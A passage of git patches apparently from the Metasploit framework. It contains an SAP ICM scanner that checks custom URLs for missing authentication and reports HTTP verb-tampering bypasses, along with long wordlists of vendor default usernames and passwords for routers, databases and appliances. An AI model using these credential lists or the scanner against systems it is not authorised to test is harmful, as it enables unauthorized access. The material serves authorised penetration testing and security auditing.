+SYSTEM ORACLE9 +SYSTEM ORACLE8 + gandalf +backuponly backuponly1 +IVPM1 + leaves +sysadm syspw +root blablabla + Compleri +USER3 USER3 +OPENSPIRIT OPENSPIRIT + spooml + changeit + wg +prime primeos +HPLASER + Vextrex +CSPUSER +qsvr qsvr +lynx lynx +SYSCKP +root letmein +Sysop Sysop +user_marketer demo +IMAGEUSER IMAGEUSER +root Password +bsxuser bsxpass +MASTER PASSWORD +USER9 USER9 +root ax400 +OLAPSYS MANAGER +SYSTEM OPERATOR +oracle oracle +root Mau?dib + MASTER +root t00lk1t +rsadmin + Daytec +OutOfBox + SZYX + cmaker + CTX_123 +rje rje +ODM_MTR MTRPW +QS_ES QS_ES +lansweeperuser mysecretpassword0* +DEMO3 +Username password +GPLD GPLD +uucp uucp +DBSNMP DBSNMP +VMARCH +GUEST TSEUG +SWUSER SWUSER +root 8RttoTriz +VTAM +OPERATNS +Operator Operator +CHEY_ARCHSVR +SYS ORACLE +roo honey +n.a guardone +accounting accounting +backuprestore backuprestore1 +PRINT PRINT + j322 + Craftr4 +dni dni +WEBADM password +iceman +guru *3noguru +FAX FAX +anon anon + j256 +USER8 USER8 +root honey +PORTAL30_SSO_PUBLIC PORTAL30_SSO_PUBLIC + 589721 +postgres +WINSABRE WINSABRE +USERP USERP +none public +Admin shs +SYS MANAGER +IVPM2 +PORTAL30_SSO PORTAL30_SSO +ALLIN1MAIL ALLIN1MAIL +POST +TEMP + xo11nE +admin nms +SYSADM SYSADM +BATCH1 +me me +SUPERVISOR NFI +PROMAIL +SECDEMO SECDEMO +ARAdmin AR#Admin# +sadmin +ORAREGSYS ORAREGSYS +VMASSYS +man +FROSTY SNOWMAN +LASER LASER +tutor + ?award +root changethis +DISKCNT +default WLAN_AP +SYSERR +WWW WWW +VAX VAX +none none + Cable-docsis +PROCAL +SUPERVISOR SYSTEM +FAXWORKS +ibm password +CTXSYS UNKNOWN +LDAP_Anonymous LdapPassword_1 +(any 3 chars) cascade +games +User 1234 + Zenith +setup/snmp setup/nopasswd +DSGATEWAY DSGATEWAY +AWARD_SW +CSMIG CSMIG + year2000 +umountfsys umountfsys + BIGO +root jstwo +VMS VMS +dni +bpel bpel +viewuser viewuser1 +admin ISPMODE +TDISK +politically correct +user_analyst demo +admin conexant +guest 1234 +root logapp +admin ip3000 +RSCS +COMPIERE COMPIERE +OSP22 OSP22 +guest1 guest1 +FORSE FORSE + lesarotl +factory factory +bubba (unknown) +admin ip20 +admin ip21 +LASER +QUSER QUSER + AWARD SW +primeos prime +admin tr650 +poll poll + j262 + xljlbj +glftpd glftpd + Advance +RMAN RMAN +mountfs mountfs +DIRECT + console +firstsite firstsite + SW_AWARD +IPFSERV + snake +Administrator Gateway +TSUSER TSUSER +BATCH2 +admin 123123 + 3098z + cc +snmp nopasswd +WebAdmin WebBoard +IBMUSER SYS1 +SMART +voadmin manager +BC4J BC4J +core phpreactor +OPERVAX OPERVAX +Bobo hello + Congress + central +WANGTEK WANGTEK +disttech etas +OWA OWA +USER2 USER2 +jasperadmin jasperadmin +FIELD DIGITAL +root uClinux +guest guestgue +FAXUSER FAXUSER +WINSABRE SABRE +VMBSYSAD +admin ip400 +PVM +ctb_admin sap123 + AMI.KEY + AMI.KEZ +  ANYCOM +USER_TEMPLATE +DEMO4 + inuvik49 +QSRV 11111111 +qsrv qsrv +superdba admin +PORTAL30 PORTAL31 +PORTAL30 PORTAL30 +XPRT XPRT +Crowd password +User 19750407 +18364 + zjaaadc +ilom-admin ilom-admin +rdc123 rdc123 +sysopr sysopr +tasman tasmannet +SYSTEM 0RACLE8I + Cisco router +admin store + SER +blank blank +ADMIN PASSWORD +admin IP address +WEBREAD WEBREAD +ODM ODM +11111111 11111111 +prime prime +AURORA$ORB$UNAUTHENTICATED INVALID +ADAMS WOOD +root vertex25 +sys bin +lp lineprin +Craft crftpw +www www +postgres dbpass +rfmngr $rfmngr$ +sync sync +WANGTEK + 1988 +MAINT +SYSTEST_CLIG SYSTEST +user user0000 +user_approver demo +ilom-operator ilom-operator +Nice-admin nicecti + HELGA-S +answer +NETNONPRIV NETNONPRIV +nuucp +CIDS CIDS +VASTEST +primenet primenet +redline redline + rw +spcl 0000 +admin muze +MBMANAGER MBMANAGER +webmaster +APPLSYS FND + ro +WINDOWS_PASSTHRU WINDOWS_PASSTHRU +USER4 USER4 +hqadmin hqadmin +UOMNI_ +FIELD TEST +sys system +Admin 123qwe +VMUTIL +POST BASE + dn_04rjc +uucpadm uucpadm +halt +FAXWORKS FAXWORKS +admin password1 +EXFSYS EXFSYS +4Dgifts +JMUSER JMUSER +admin imsa7.0 +SUPERVISOR NETFRAME +CIS CIS +UNITY_ + ciscofw +HLW HLW +admin brocade1 +pwrchute pwrchute + setup + Tiny +IDMSSE +postgres svcPASS83 +NSA nsa +!root !ishtar +admin blank +root NeXT +TELEDEMO TELEDEMO + AMIDECOD +recover recover +TRAVEL TRAVEL +lexar + efmukl +viewer +LIBRARY +admin raritan +PO8 PO8 +root@localhost root +NAMES NAMES +secofr secofr +PDMREMI + biostar +MGE VESOFT +USER7 USER7 +OWA_PUBLIC OWA_PUBLIC +questra questra +builtin builtin +SFCNTRL +SAP* 6071992 +boss boss +anonymous password + isolation + Q54arwms +PLEX PLEX +OLAPDBA OLAPDBA + g6PJ +OLAPSVR INSTANCE +user_expert demo +root pixmet2003 +Bhosda Lund +TEST +qsvr ibmcel +CMSBATCH CMSBATCH + ABCD +gropher + AM +administrator admin + condo + Toshiba + familymacintosh +TAHITI TAHITI +NEWINGRES NEWINGRES + AMI?SW + mMmM +man man +VM3812 +root powerapp +ibm service +VIF_DEVELOPER VIF_DEV_PWD +ADMIN WELCOME +Admin Barricade +joeuser joeuser +system isp +IPC +HELPDESK HELPDESK +wlpisystem wlpisystem +TSAFVM +prtgadmin prtgadmin +SYSTEM CHANGE_ON_INSTALL + CONCAT + t0ch88 +webmaster webmaster + djonet +ADMIN changeme +Any + Compaq +UAMIS_ +theman changeit +CISINFO CISINFO +mobile dottie +QS_CB QS_CB +CDEMORID CDEMORID +tech nician +DEMO2 +administrator none +SYS MANAG3R +End User 7936 +PORTAL30_PUBLIC PORTAL30_PUBLIC +sysadmin nortel +SYS D_SYSTPW +SYSTEM SYSPASS +Guest blank +User User +MDDEMO_CLERK CLERK +FIELD FIELD +Admin SECRET123 +Guest Guest +PHANTOM +admin amigosw1 + xmux +write +ADMINISTRATOR SENTINEL +system field + ducati900ss +qsecofr 22222222 + lkw peter + awkward + TzqF +SYSTEST_CLIG SYSTEST_CLIG +ODS ODS +admin axis2 +BLAKE PAPER +TSDEV TSDEV +PRODBM +admin letmein + joh316 +dos dos +login 0000 +APL2PP +system hdms +admin phplist +god1 12345 +admin novell +CICSUSER CISSUS +22222222 22222222 +root passw0rd +user_publisher demo +OSE$HTTP$ADMIN (random password) +def trade +SuperUser kronites +QS_CBADM QS_CBADM +SYSA SYSA + 00000000 +STUDENT STUDENT +Draytek 1234 +SMDR SECONDARY +EREP +VSEMAN + OOOOOOOO +primos_cs prime +demo +fwadmin xceladmin + j64 +MTS_USER MTS_PASSWORD + AWARD_SW +AQDEMO AQDEMO +private ReadWrite access secret + GWrv + MagiMFP + SnuFG5 +IS_$hostname IS_$hostname +HPSupport badg3r5 +ORASSO ORASSO +GATEWAY + t0ch20x +CVIEW +SH SH + zeosx +XXSESS_MGRYY X#1833 + wodj + FOOBAR +SYSMAN SYSMAN +VMMAP +admin urchin +PORTAL30_DEMO PORTAL30_DEMO +Ezsetup +QS_CS QS_CS +administrator PlsChgMe! +CMSUSER + MCUrv +DEMO1 +admin adminadmin +userNotUsed userNotU + AMI~ +root ibm +ncadmin ncadmin +TESTPILOT TESTPILOT + Polrty +fg_sysadmin password +UETP UETP +QS QS +DBI MUMBLEFRATZ +  ILMI +SYSTEM SYS +JWARD AIROPLANE +APPS_MRC APPS_MRC + uboot +Moe hello +SENTINEL SENTINEL +admin netgear1 +Yak asd123 +PDP11 PDP11 + aammii +Flo hello +SLIDE SLIDEPW +root bagabu +primeos primeos + Spacve + 256256 +INFO INFO +checkfsys checkfsys +PRODCICS PRODCICS + foolproof + AWARD_PW +MXAGENT MXAGENT +SYSTEM ORACLE8I +admin no password +VMTLIBR +POWERCARTUSER POWERCARTUSER +VMBACKUP +CPNUC + QDI + shiva +distrib distrib0 +SUPERVISOR SUPERVISOR +SYSMAINT SERVICE +MIGRATE MIGRATE +CDEMOUCB CDEMOUCB +system prime +QSRV 22222222 + c +OLTSEP +sysbin sysbin +signa signa +autocad autocad + SWITCHES_SW +WEBDB WEBDB +daemon + aPAf +ncrm ncrm +SAMPLE SAMPLE + 1 +HCPARK HCPARK +ALLINONE ALLINONE +nm2user nm2user +SAVSYS +IIPS +PATROL PATROL + technolgi + MBIU0 +mailadmin secret +adm adm +TMSADM +tutor tutor +ESubscriber +CHEY_ARCHSVR CHEY_ARCHSVR +write synnet +software software +admin welcome +god2 12345 +bbs bbs + Dell +disttech disttech +FSFTASK2 + zbaaaca + prost +ORDSYS ORDSYS +Administrator administrator + 1234567890 +gopher gopher +PSFMAINT +SYSTEM MANAG3R + RM + s!a@m#n$p%c +EAdmin +12345 12345 +DECNET DECNET +OPERATIONS OPERATIONS +$system +REP_OWNER DEMO +PANAMA PANAMA +LIBRARIAN SHELVES +SYSTEM 0RACLE +fal +4Dgifts 4Dgifts + biosstar +NETSERVER NETSERVER + tiny +root TANDBERG +POWERCHUTE APC +USER5 USER5 +GPFD GPFD + 12345678 +blank admin +QS_OS QS_OS +sysadm admin +REPADMIN REPADMIN +Administrator 12345678 +0 0 +DEMO8 DEMO8 +DEMO9 DEMO9 +CDEMO82 CDEMO82 +admin boca raton +Administrator vision2 +administrator 0 +umountsys umountsys +snmp snmp +Username PASSWORD +volition +USER0 USER0 +CDEMOCOR CDEMOCOR +SYSTEST UETP +Rodopi Rodopi +DECNET NONPRIV +user_checker demo + tatercounter2000 +qserv qserv + ESSEX or IPC +AQ AQ +support +SAPR3 SAP +VRR1 VRR1 +fastwire fw +admi admin +FINANCE FINANCE +WinCCAdmin 2WSXcder +ESTOREUSER ESTORE +fax fax +VIRUSER VIRUSER +LINK LINK +APPLSYSPUB FNDPUB + BIOS +SYS ORACLE8 +SYS ORACLE9 +overseer overseer +checksys checksys +umountfs umountfs +DBDCCICS DBDCCIC +Admin password + x6zynd56 +TOAD TOAD +root mozart +ntpupdate ntpupdate +root router +MDDEMO_MGR MGR +ARCHIVIST +SUPERVISOR HARRIS + 11111 +billy-bob +lp bin +DECMAIL DECMAIL +alien alien +admin dnnadmin +nsroot nsroot +AdvWebadmin advcomm500349 +dvstation dvst10n +SERVICECONSUMER1 SERVICECONSUMER1 +MMO2 MMO2 +qsecofr 11111111 +NOC NOC +WWWUSER WWWUSER +root Serial port only +SAP SAPR3 +root t0talc0ntr0l4! +NEVIEW +MAIL +ODSCOMMON ODSCOMMON +fal fal +pixadmin pixadmin +ripeop +PENG + BIOSPASS +netlink netlink +L2LDEMO L2LDEMO +OUTLN OUTLN +12.x +scott tiger or tigger + toshy99 +dbase dbase + nz0u4bbe +fam fam + bell9 +Oper Oper +RMAIL RMAIL +administrator 19750407 +FND FND +admin exinda +PRIV PRIV +admin barney +SETUP + biodata + 24Banc81 +news news +VSEIPO + j09F +pw pw +GUEST +ilon ilon + award_? +SYS 0RACLE39 +SYS 0RACLE38 +DEFAULT DEFAULT + AMI!SW +PLSQL SUPERSECRET +root alpine +politcally correct +18140815 18140815 +APPUSER APPUSER +SUPERVISOR +CENTRA CENTRA +LBACSYS LBACSYS + alfarome +PDP8 PDP8 +SFCMI +administrator * * # +lpadm lpadm +Test Everything +bewan bewan + 2580 +DIP DIP + Sxyz +mfd mfd +MDDEMO MDDEMO + intermec + 589589 +SWPRO SWPRO +DES DES +root fibranne +Coco hello +GCS +rodopi rodopi + touchpwd= +Scott Tiger +Admin5 4tugboat +admin funkwerk +ANDY SWORDFISH +DESQUETOP +nobody +Manager 657 + mysweex +SYSTEM SYSLIB +NETCON NETCON +JONES STEEL +author author +MOESERV +web web +tech User +PUBSUB1 PUBSUB1 +SYS D_SYSPW +CATALOG CATALOG + IBM + Guest +SQLUSER +RE RE +REPORTS_USER OEM_TEMP +MFG MFG +POST POST +HPLASER HPLASER +HR HR +VIDEOUSER VIDEO USER +DBA SQL + CMOSPWD +guest1 guest +superuser asante +SYSTEM 0RACLE38 +SYSTEM 0RACLE39 +AUTOLOG1 +dadmin dadmin +AURORA$JIS$UTILITY$ +wlcsystem wlcsystem +news +CPRM From dd1a47f31f2464869cb73dae0ab13189b22eb268 Mon Sep 17 00:00:00 2001 From: sappirate Date: Wed, 26 Mar 2014 21:14:39 +0100 Subject: [PATCH 17/33] Modified sap_icm_urlscan to check for authentication of custom URLs Fixed ruby coding style --- .../auxiliary/scanner/sap/sap_icm_urlscan.rb | 27 ++++++++++++++++--- 1 file changed, 24 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 2cff53d60b..870936569c 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -89,6 +89,8 @@ class Metasploit3 < Msf::Auxiliary urls_to_check.each do |url| check_url(url.strip) end + # check custom URLs + check_urlprefixes else print_error("#{rhost}:#{rport} No response received") end @@ -110,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary case when res.code == 200 - print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)") + print_good("#{rhost}:#{rport} #{url} - does not require authentication (200) (length: #{res.headers['Content-Length']})") when res.code == 403 print_good("#{rhost}:#{rport} #{url} - restricted (403)") when res.code == 401 @@ -129,7 +131,7 @@ class Metasploit3 < Msf::Auxiliary end else - print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)") + print_status("#{rhost}:#{rport} #{url} - not found (No Response code Received)") end end @@ -143,9 +145,28 @@ class Metasploit3 < Msf::Auxiliary }, 20) if (res and res.code == 200) - print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering") + print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering (length: #{res.headers['Content-Length']})") else print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") end end + + def check_urlprefixes + # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS. This is how the message server finds out which URLs must be forwarded where." (SAP help) + # -> this disclose custom URLs that are also checked for authentication + res = send_request_cgi({ + 'uri' => "/sap/public/icf_info/urlprefix", + 'method' => 'GET', + 'ctype' => 'text/plain', + }, 20) + if (res and res.code == 200) + res.body.each_line do |line| + if line =~ /PREFIX=/ + url_enc = line.sub(/^PREFIX=/, '') + url_dec = URI.unescape(url_enc).sub(/;/, '') + check_url(url_dec.strip) + end + end + end + end end From 6ec926b573f945e9590b306be292b4152b08a38a Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi Date: Sun, 18 May 2014 10:18:07 +0200 Subject: [PATCH 18/33] Added separate users/pass/userpass dictionaries --- .../default_passwords_for_services_unhash.txt | 1214 +++++++++++ .../default_userpass_for_services_unhash.txt | 1787 +++++++++++++++++ .../default_users_for_services_unhash.txt | 915 +++++++++ 3 files changed, 3916 insertions(+) create mode 100644 data/wordlists/default_passwords_for_services_unhash.txt create mode 100644 data/wordlists/default_userpass_for_services_unhash.txt create mode 100644 data/wordlists/default_users_for_services_unhash.txt diff --git a/data/wordlists/default_passwords_for_services_unhash.txt b/data/wordlists/default_passwords_for_services_unhash.txt new file mode 100644 index 0000000000..7203bcda29 --- /dev/null +++ b/data/wordlists/default_passwords_for_services_unhash.txt @@ -0,0 +1,1214 @@ +admin + +password +1234 +epicrouter +sysadm +access +root +tech +smcadmin +0 +pass +system +PASSWORD +Symbol +guest +bintec +security +synnet +manager +adtran +motorola +smile +cascade +BRIDGE +netman +super +switch +setup +changeme +operator +user +Cisco +Manager +TJM +apc +cisco +letmein +router +trancell +ascend +friend +NetICs +blender +netscreen +SKY_FOX +public +Master +default +laflaf +cmaker +RSX +Posterie +private +attack +monitor +xdfk9874t3 +netopia +Col2ogro2 +microbusiness +op +OCS +secure +atlantis +sysadmin +5777364 +echo +maint +SESAME +danger +lucenttech2 +d.e.b.u.g +hello +SYSTEM +calvin +xxyyzz +highspeed +123 +Sharp +mysweex +4tas +masterkey +0000 +permit +barricade +support +tslinux +hp.com +recovery +PASSW0RD +engineer +administrator +pwp +isee +NETWORK +JDE +superuser +Super +admin123 +surt +rwa +123456 +NetCache +ADTRAN +USER +test +extendnet +ironport +lp +1111 +PASS +ro +Ascend +_Cisco +MAIL +sitecom +hsadb +CAROLIAN +ADMINISTRATOR +sysAdmin +tini +Helpdesk +SERVICE +PBX +FIELD.SUPPORT +sys +abc123 +1502 +star +MGR.SYS +anicust +Administrator +Intel +12345 +lucenttech1 +secret +piranha +wlsedb +l3 +diamond +naadmin +1988 +radius +MANAGER.SYS +raidzone +3ascotel +HPOFFICE +demo +166816 +Password +zoomadsl +D-Link +l2 +CCC +rw +cgadmin +specialist +NetVCR +COGNOS +q +MServer +cms500 +davox +enquirypw +at4400 +h179350 +asd +240653C9467E45 +atc123 +admin_1 +266344 +WORD +ITF3000 +connect +HPONLY +nmspw +client +comcomcom +speedxess +ROBELLE +uplink +SYS +letacla +FORCE +REMOTE +backdoor +CNAS +22222 +gen2 +medion +admn +56789 +PRODDTA +tellabs#1 +dadmin01 +dhs3mt +SECURITY +changeme! +llatsni +adfexc +Asante +!manage +21241036 +TELESUP +crftpw +help +lantronix +netadmin +HP +SUPPORT +VESOFT +$secure$ +OP.OPERATOR +hs7mwxkk +patrol +SUPER +SMDR +1064 +DISC +cellit +INTX3 +inads +tlah +wyse +locatepw +visual +r@p8p0r+ +xbox +TENmanUFactOryPOWER +device +NICONEX +admin1234 +fivranne +acc +31994 +bcimpw +bluepw +PlsChgMe +R1QTPS +ccrusr +MPE +telecom +gen1 +SSA +snmp-Trap +HTTP +mtch +adslolitec +ganteng +bciimpw +browsepw +Admin +change_on_install +changeme2 +Exabyte +rmnetlm +replicator +intel +HPP196 +radware +intermec +mlusr +RJE +LOTUS +initpw +e250changeme +SpIp +adminttd +field +supportpw +MiniAP +RIP000 +XLSERVER +HPP187 +HPP189 +indspw +linga +craft +enter +NAU +rcustpw +AitbISP4eCiG +mtcl +CONV +bcnaspw +NETBASE +REGO +cacadmin +mediator +talent +kermit +x-admin +HPDESK +9999 +ROOT500 +my_DEMARC +volition +GlobalAdmin +4getme2 +UI-PSWD-01 +2222 +UI-PSWD-02 +TCH +Fireport +ILMI +maintpw +supervisor +e500changeme +mu +NULL +custpw +noway +tiaranet +bcmspw +TANDBERG +m1122 +telco +xd +dhs3pms +winterm +craftpw +rwmaint +any@ +looker +none +MANAGER +1234admin +MGR +tuxalize +timely +User +8429 +manage +Babylon +hagpolm1 +scmchangeme +tivonpw +installer +webadmin +pbxk1064 +19920706 +pento +NetSurvibox +D_SYSTPW +3477 +$chwarzepumpe +asecret +10023 +help1954 +corecess +master +Protector +HPWORD +symbol +weblogic +sys/change_on_install +3ep5w2u +8111 +jannie +tomcat +pilou +3ware +ANYCOM +tiger123 +asante +smallbusiness +ntacdmax +w2402 +wlsepassword +kilo1987 +articon +michelangelo +Mau'dib +Serial +ggdaseuaimhrke +maintain +syslib +init +PUBSUB +CTXSYS +bill +60020 +dmr99 +GUEST +06071992 +Trintech +otbu+1 +Multi +babbit +w0rkplac3rul3s +Telecom +qsysopr +imss7.0 +nokia +APPS +isdev +mail +draadloos +qsecofr +default.password +5678 +nimdaten +456 +P@55w0rd! +par0t +db2fenc1 +control +isp +QSRV +iDirect +MDSYS +vpasp +TEST +QSECOFR +2501 +leviton +blank +informix +mpegvideo +games +0P3N +hawk201 +scout +qpgmr +admin000 +expert03 +images +surecom +Geardog +symantec +adslroot +xyzzy +adaptec +serial# +BACKUP +stratauser +rootme +!root +webibm +riverhead +COMPANY +DSL +amber +eagle +brightmail +HEWITT +ods +toplayer +OkiLAN +rootpass +wrgg15_di524 +x40rocks +nokai +Admin1 +ImageFolio +iolan +pfsense +sales +iscopy +OEM_TEMP +RSAAppliance +themaster01 +ANS#150 +passwort +welcome +NetSeq +BRIO_ADMIN +citel +oracle +kn1TG7psLu +SYSPASS +lkwpeter +DEV2000_DEMOS +checkfs +USER1 +resumix +HELP +logapp +0RACLE9 +0RACLE8 +57gbzb +qsrvbas +sldkj754 +STRAT_PASSWD +19750407 +USERP +primeos +OEMREP +[^_^] +USER6 +TTPTHA +powerdown +Mau’dib +ORACL3 +nimda +DEMO +2WSXcder +ALLIN1 +sysadmpw +QSRVBAS +ip305Beheer +ACCORD +AQJAVA +LASERWRITER +nsi +PERFSTAT +MBWATCH +protection +unix +OWNER +NETPRIV +AWARD?SW +changethis +SYMPA +REP_OWNER +DCL +dbps +ARCHIVIST +basisk +demos +NETMGR +OAS_PUBLIC +AP +j5Brn9 +MTSSYS +DIGITAL +AUDIOUSER +teX1 +allot +$SRV +0RACLE +nicecti +ROOT +PRINTER +m1link +l1 +trouble +trendimsa1.0 +HOST +ADLDEMO +QS_ADM +AMI +OPER +PO7 +komprie +MAINT +toor +AMISETUP +sp99dd +halt +MSHOME +secacm +3Com +db2admin +Airaya +visor +Wireless +IMEDIA +Biostar +install +primos +infrant1 +Partner +Administrative +USER_TEMPLATE +pnadmin +h6BB +lpadmin +VTAM +TRACE +POSTMASTER +MAILER +QS_WS +sma +system_admin +nobody +Tasmannet +!admin +DISCOVERER_ADMIN +LR-ISDN +TURBINE +GL +PO +AMI_SW +superpass +YES +GATEWAY +PRIMARY +award.sw +lucy99 +pwpw +EMP +cclfb +SITEMINDER +Any +vgnadmin +NEWS +Ektron +Award +AQUSER +UTLESTAT +AMIAMI +netbotz +CHANGE_ON_INSTALL +sap123 +Crystal +Daewuu +ftp +(random +MCUser1 +admpw +rootadmin +PM +ULTIMATE +role1 +enhydra +NF +EVENT +xyzall +rainbow +JETSPEED +PORTAL30_SSO_PS +OO +WKSYS +OPERATNS +ksdjfg934t +merlin +OE +Local +OCITEST +HLT +last +CTXDEMO +zebra +QDBA +LRISDN +tele +WEBCAL01 +rsadmin +ORACLE +alien +sanfran +ReadOnly +AMIPSWD +MOREAU +abd234 +QNX +dnnhost +sertafu +ORDPLUGINS +telos +ADMIN +adminpass +crash +ACCESS +SDOS_ICSAP +adminpwd +BATCH +GUESTGUEST +SYSMAINT +postmast +DSSYS +award_ps +ZAAADA +MGWUSER +NTCIP +hewlpack +TDOS_ICSAP +ssp +EJSADMIN +damin +INGRES +A.M.I +1322222 +VCSRV +storageserver +ssladmin +CLOTH +shutdown +OEMADM +restoreonly1 +quser +MILLER +trmcnfg +REPORT +aLLy +tour +mountfsys +PROG +iwill +Public +mp3mystic +hpt +peribit +STARTER +GUESTGUE +guardone +daemon +mountsys +ORACLE9 +ORACLE8 +gandalf +backuponly1 +leaves +syspw +blablabla +Compleri +USER3 +OPENSPIRIT +spooml +changeit +wg +Vextrex +qsvr +lynx +Sysop +IMAGEUSER +bsxpass +USER9 +ax400 +OPERATOR +Mau?dib +MASTER +t00lk1t +Daytec +SZYX +CTX_123 +rje +MTRPW +QS_ES +mysecretpassword0* +GPLD +uucp +DBSNMP +TSEUG +SWUSER +8RttoTriz +Operator +honey +accounting +backuprestore1 +PRINT +j322 +Craftr4 +dni +*3noguru +FAX +anon +j256 +USER8 +PORTAL30_SSO_PUBLIC +589721 +WINSABRE +shs +PORTAL30_SSO +ALLIN1MAIL +xo11nE +nms +SYSADM +me +NFI +SECDEMO +AR#Admin# +ORAREGSYS +SNOWMAN +LASER +?award +WLAN_AP +WWW +VAX +Cable-docsis +UNKNOWN +LdapPassword_1 +3 +Zenith +setup/nopasswd +DSGATEWAY +CSMIG +year2000 +umountfsys +BIGO +jstwo +VMS +bpel +viewuser1 +ISPMODE +correct +conexant +ip3000 +COMPIERE +OSP22 +guest1 +FORSE +lesarotl +factory +(unknown) +ip20 +ip21 +QUSER +AWARD +prime +tr650 +poll +j262 +xljlbj +glftpd +Advance +RMAN +mountfs +console +firstsite +SW_AWARD +snake +Gateway +TSUSER +123123 +3098z +cc +nopasswd +WebBoard +SYS1 +BC4J +phpreactor +OPERVAX +Congress +central +WANGTEK +etas +OWA +USER2 +jasperadmin +uClinux +guestgue +FAXUSER +SABRE +ip400 +AMI.KEY +AMI.KEZ +inuvik49 +11111111 +qsrv +PORTAL31 +PORTAL30 +XPRT +zjaaadc +ilom-admin +rdc123 +sysopr +tasmannet +0RACLE8I +store +SER +IP +WEBREAD +ODM +INVALID +WOOD +vertex25 +bin +lineprin +www +dbpass +$rfmngr$ +sync +SYSTEST +user0000 +ilom-operator +HELGA-S +NETNONPRIV +CIDS +primenet +redline +muze +MBMANAGER +FND +WINDOWS_PASSTHRU +USER4 +hqadmin +123qwe +BASE +dn_04rjc +uucpadm +FAXWORKS +password1 +EXFSYS +JMUSER +imsa7.0 +NETFRAME +CIS +ciscofw +HLW +brocade1 +pwrchute +Tiny +svcPASS83 +nsa +!ishtar +NeXT +TELEDEMO +AMIDECOD +recover +TRAVEL +efmukl +raritan +PO8 +NAMES +secofr +biostar +USER7 +OWA_PUBLIC +questra +builtin +6071992 +boss +isolation +Q54arwms +PLEX +OLAPDBA +g6PJ +INSTANCE +pixmet2003 +Lund +ibmcel +CMSBATCH +ABCD +AM +condo +Toshiba +familymacintosh +TAHITI +NEWINGRES +AMI?SW +mMmM +man +powerapp +service +VIF_DEV_PWD +WELCOME +Barricade +joeuser +HELPDESK +wlpisystem +prtgadmin +CONCAT +t0ch88 +webmaster +djonet +Compaq +CISINFO +dottie +QS_CB +CDEMORID +nician +MANAG3R +PORTAL30_PUBLIC +nortel +CLERK +FIELD +SECRET123 +Guest +amigosw1 +xmux +SENTINEL +ducati900ss +22222222 +lkw +awkward +TzqF +SYSTEST_CLIG +ODS +axis2 +PAPER +TSDEV +joh316 +dos +hdms +phplist +novell +CISSUS +passw0rd +trade +kronites +QS_CBADM +SYSA +00000000 +STUDENT +SECONDARY +OOOOOOOO +xceladmin +j64 +MTS_PASSWORD +AWARD_SW +AQDEMO +ReadWrite +GWrv +MagiMFP +SnuFG5 +IS_$hostname +badg3r5 +ORASSO +t0ch20x +SH +zeosx +X#1833 +wodj +FOOBAR +SYSMAN +urchin +PORTAL30_DEMO +QS_CS +PlsChgMe! +MCUrv +adminadmin +userNotU +AMI~ +ibm +ncadmin +TESTPILOT +Polrty +UETP +QS +MUMBLEFRATZ +AIROPLANE +APPS_MRC +uboot +netgear1 +asd123 +PDP11 +aammii +SLIDEPW +bagabu +Spacve +256256 +INFO +checkfsys +PRODCICS +foolproof +AWARD_PW +MXAGENT +ORACLE8I +no +POWERCARTUSER +QDI +shiva +distrib0 +SUPERVISOR +MIGRATE +CDEMOUCB +c +sysbin +signa +autocad +SWITCHES_SW +WEBDB +aPAf +ncrm +SAMPLE +1 +HCPARK +ALLINONE +nm2user +PATROL +technolgi +MBIU0 +adm +tutor +CHEY_ARCHSVR +software +bbs +Dell +disttech +zbaaaca +prost +ORDSYS +1234567890 +gopher +RM +s!a@m#n$p%c +DECNET +OPERATIONS +PANAMA +SHELVES +4Dgifts +biosstar +NETSERVER +tiny +APC +USER5 +GPFD +12345678 +QS_OS +REPADMIN +DEMO8 +DEMO9 +CDEMO82 +boca +vision2 +umountsys +snmp +USER0 +CDEMOCOR +Rodopi +NONPRIV +tatercounter2000 +qserv +ESSEX +AQ +SAP +VRR1 +fw +FINANCE +ESTORE +fax +VIRUSER +LINK +FNDPUB +BIOS +overseer +checksys +umountfs +DBDCCIC +x6zynd56 +TOAD +mozart +ntpupdate +HARRIS +11111 +DECMAIL +dnnadmin +nsroot +advcomm500349 +dvst10n +SERVICECONSUMER1 +MMO2 +NOC +WWWUSER +SAPR3 +t0talc0ntr0l4! +ODSCOMMON +fal +pixadmin +BIOSPASS +netlink +L2LDEMO +OUTLN +tiger +toshy99 +dbase +nz0u4bbe +fam +bell9 +Oper +RMAIL +exinda +PRIV +barney +biodata +24Banc81 +news +j09F +pw +ilon +award_? +0RACLE39 +0RACLE38 +DEFAULT +AMI!SW +SUPERSECRET +alpine +18140815 +APPUSER +CENTRA +LBACSYS +alfarome +PDP8 +* +lpadm +Everything +bewan +2580 +DIP +Sxyz +mfd +MDDEMO +589589 +SWPRO +DES +fibranne +rodopi +touchpwd= +Tiger +4tugboat +funkwerk +SWORDFISH +657 +SYSLIB +NETCON +STEEL +author +web +PUBSUB1 +D_SYSPW +CATALOG +IBM +RE +MFG +POST +HPLASER +HR +VIDEO +SQL +CMOSPWD +dadmin +wlcsystem diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt new file mode 100644 index 0000000000..8610e57e07 --- /dev/null +++ b/data/wordlists/default_userpass_for_services_unhash.txt @@ -0,0 +1,1787 @@ +admin:admin +: +admin: +:admin +admin:password +admin:1234 +root: +Administrator:admin +admin:epicrouter +sysadm:sysadm +:1234 +:password +:access +root:root +tech:tech +:smcadmin +:0 +Administrator: +root:pass +:system +root:admin +:PASSWORD +:Symbol +operator: +guest:guest +admin:bintec +security:security +guest: +debug:synnet +manager:manager +:adtran +admin:motorola +service:smile +:cascade +admin:0 +!root: +user:password +:BRIDGE +netman:netman +super:super +admin:switch +admin:setup +admin:changeme +diag:switch +operator:operator +user:user +user: +Cisco:Cisco +Manager:Manager +DTA:TJM +apc:apc +tech: +:cisco +User: +root:1234 +Admin: +:letmein +cablecom:router +adm: +wradmin:trancell +:ascend +manager:friend +:NetICs +root:blender +netscreen:netscreen +:sysadm +:SKY_FOX 